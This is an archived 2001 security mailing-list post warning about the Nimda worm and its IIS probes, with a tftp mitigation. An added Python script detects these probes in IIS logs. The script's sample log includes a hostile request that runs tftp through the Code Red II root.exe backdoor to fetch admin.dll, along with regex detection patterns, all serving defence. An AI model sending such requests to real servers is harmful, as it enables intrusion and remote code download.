From: Fred Cohen <fc@all.net>
To: iwar@onelist.com (Information Warfare Mailing List)
Reply-To: iwar@yahoogroups.com
Date: Tue, 18 Sep 2001 09:20:36 -0700 (PDT)
Subject: [iwar] [fc:More.on.the.worms...]
Message-Id: <200109181620.JAA05742@big.all.net>
Mailing-List: list iwar@yahoogroups.com; contact iwar-owner@yahoogroups.com
Organization: I'm not allowed to say
X-Mailer: ELM [version 2.5 PL1]

There have been numerous reports of IIS attacks being generated by machines over a broad range of IP addresses. These "infected" machines are using a wide variety of attacks which attempt to exploit already known and patched vulnerabilities against IIS.
It appears that the attacks can come both from email and from the network. A new worm, being called w32.nimda.amm, is being sent around. The attachment is called README.EXE and comes as a MIME-type of "audio/x-wav" together with some html parts. There appears to be no text in this message when it is displayed by Outlook in Auto-Preview mode (always a good indication there's something not quite right with an email.)

The network attacks against IIS boxes are a wide variety of attacks. Amongst them appear to be several attacks that assume the machine is compromised by Code Red II (looking for ROOT.EXE in the /scripts and /msadc directory, as well as an attempt to use the /c and /d virtual roots to get to CMD.EXE). Further, it attempts to exploit numerous other known IIS vulnerabilities.

One thing to note is the attempt to execute TFTP.EXE to download a file called ADMIN.DLL from (presumably) some previously compromised box. Anyone who discovers a compromised machine (a machine with ADMIN.DLL in the /scripts directory), please forward me a copy of that .dll ASAP. Also, look for TFTP traffic (UDP69).

As a safeguard, consider doing the following: edit %systemroot/system32/drivers/etc/services and change the line

    tftp 69/udp

to

    tftp 0/udp

thereby disabling the TFTP client. W2K has TFTP.EXE protected by Windows File Protection so it can't be removed.

More information as it arises.

Cheers,
Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor

-----BEGIN PGP SIGNATURE-----
Version: PGP Personal Privacy 6.5.2

iQCVAwUBO6dmcRBh2Kw/l7p5AQHJCgQA1JHwqF5RjJX+QVMMDUChVqn6yReQXqEH
Tm8Ujms5+6ia0tcT1qmZWJV48eHYNzV3+AyyO6Gn8ds/NVYJUupDHB1Yy1DY/po6
iycY2qnARDJP6KNmHI0bAdBUBtsnVo5P9itElIoqKbAorQjamKI2eqd4TdE0yfIO
hSW7yN2lhJc=
=YAwc
-----END PGP SIGNATURE-----
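The post names three things a defender can look for in IIS logs (ROOT.EXE under /scripts or /msadc, CMD.EXE reached through the /c and /d virtual roots, a TFTP fetch of ADMIN.DLL) and one host-side mitigation (remapping tftp from 69/udp to 0/udp in the services file). The script below is an added example, not code from the original message or from NTBugtraq: it scans W3C-format IIS log lines for those indicators and applies the services-file edit with a check that it took and is a no-op when repeated. Every log line, client address and the services excerpt are constructed samples; the indicator names and the `/[cd]/.*cmd\.exe` generalization of the virtual-root probe are my own.

```python
"""Added example, not part of the original message: a log scan for the IIS
probes named in the post (root.exe under /scripts or /msadc, cmd.exe via the
/c and /d virtual roots, a tftp fetch of admin.dll) and a checked version of
the services-file edit it recommends.  All log lines, addresses and the
services excerpt are constructed samples."""
import re
from typing import Iterable

# Indicators taken from the post.  Matching is case-insensitive because IIS
# path lookups are; "/[cd]/.*cmd\.exe" (an assumption) covers any path reached
# through the /c or /d virtual roots rather than one fixed location of CMD.EXE.
PROBE_PATTERNS = {
    "codered2-backdoor": re.compile(r"/(scripts|msadc)/root\.exe", re.I),
    "virtual-root-cmd": re.compile(r"/[cd]/.*cmd\.exe", re.I),
    "tftp-admin-dll": re.compile(r"tftp.*admin\.dll", re.I),
}

# Constructed IIS W3C extended log excerpt (fields as declared in the
# #Fields directive).  Client addresses are from the documentation ranges.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-09-18 16:20:36 198.51.100.7 GET /scripts/root.exe - 404
2001-09-18 16:20:37 198.51.100.7 GET /MSADC/root.exe - 404
2001-09-18 16:20:38 198.51.100.7 GET /d/winnt/system32/cmd.exe - 404
2001-09-18 16:20:39 203.0.113.22 GET /scripts/root.exe /c+tftp+-i+192.0.2.10+GET+admin.dll 200
2001-09-18 16:20:40 192.0.2.55 GET /default.htm - 200
2001-09-18 16:20:41 192.0.2.55 GET /images/logo.gif - 200
"""


def scan_iis_log(lines: Iterable[str]) -> list[tuple[str, str, str]]:
    """Return (client_ip, indicator, request) for every indicator hit.

    A line may produce several hits: the tftp fetch in the sample also goes
    through /scripts/root.exe, which is worth knowing on its own because it
    shows the target was expected to carry the Code Red II backdoor.
    """
    hits = []
    for line in lines:
        if not line.strip() or line.startswith("#"):
            continue  # directives and blank lines carry no request
        fields = line.split()
        if len(fields) < 6:
            continue  # malformed line; skip rather than guess at fields
        c_ip, stem, query = fields[2], fields[4], fields[5]
        request = stem if query == "-" else f"{stem}?{query}"
        for name, pattern in PROBE_PATTERNS.items():
            if pattern.search(request):
                hits.append((c_ip, name, request))
    return hits


def suspect_hosts(hits) -> list[str]:
    """Distinct client addresses that sent at least one probe, sorted."""
    return sorted({ip for ip, _, _ in hits})


# Constructed excerpt in the layout of %SystemRoot%\system32\drivers\etc\services.
SAMPLE_SERVICES = """\
# constructed excerpt, not a real services file
echo                7/tcp
ftp                21/tcp
tftp               69/udp
http               80/tcp    www www-http
"""

TFTP_LINE = re.compile(r"^(tftp\s+)69(/udp\b)", re.I | re.M)


def disable_tftp_client(services_text: str) -> tuple[str, bool]:
    """Apply the post's edit (tftp 69/udp -> tftp 0/udp) and report whether
    anything changed, so a second run is a harmless no-op."""
    new_text, count = TFTP_LINE.subn(r"\g<1>0\2", services_text)
    return new_text, count > 0


def tftp_client_disabled(services_text: str) -> bool:
    """True when no line still maps the tftp service to UDP port 69."""
    return TFTP_LINE.search(services_text) is None


if __name__ == "__main__":
    hits = scan_iis_log(SAMPLE_LOG.splitlines())
    for ip, indicator, request in hits:
        print(f"{ip:15} {indicator:18} {request}")
    print("suspect hosts:", suspect_hosts(hits))
    patched, changed = disable_tftp_client(SAMPLE_SERVICES)
    print("services edited:", changed, "tftp disabled:", tftp_client_disabled(patched))
```

The services edit is a host-side change only; it does nothing for hosts you have not touched and does not stop UDP/69 datagrams on the wire, so the post's advice to watch for TFTP traffic still stands alongside it.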
This archive was generated by hypermail 2.1.2 : 2001-09-29 21:08:45 PDT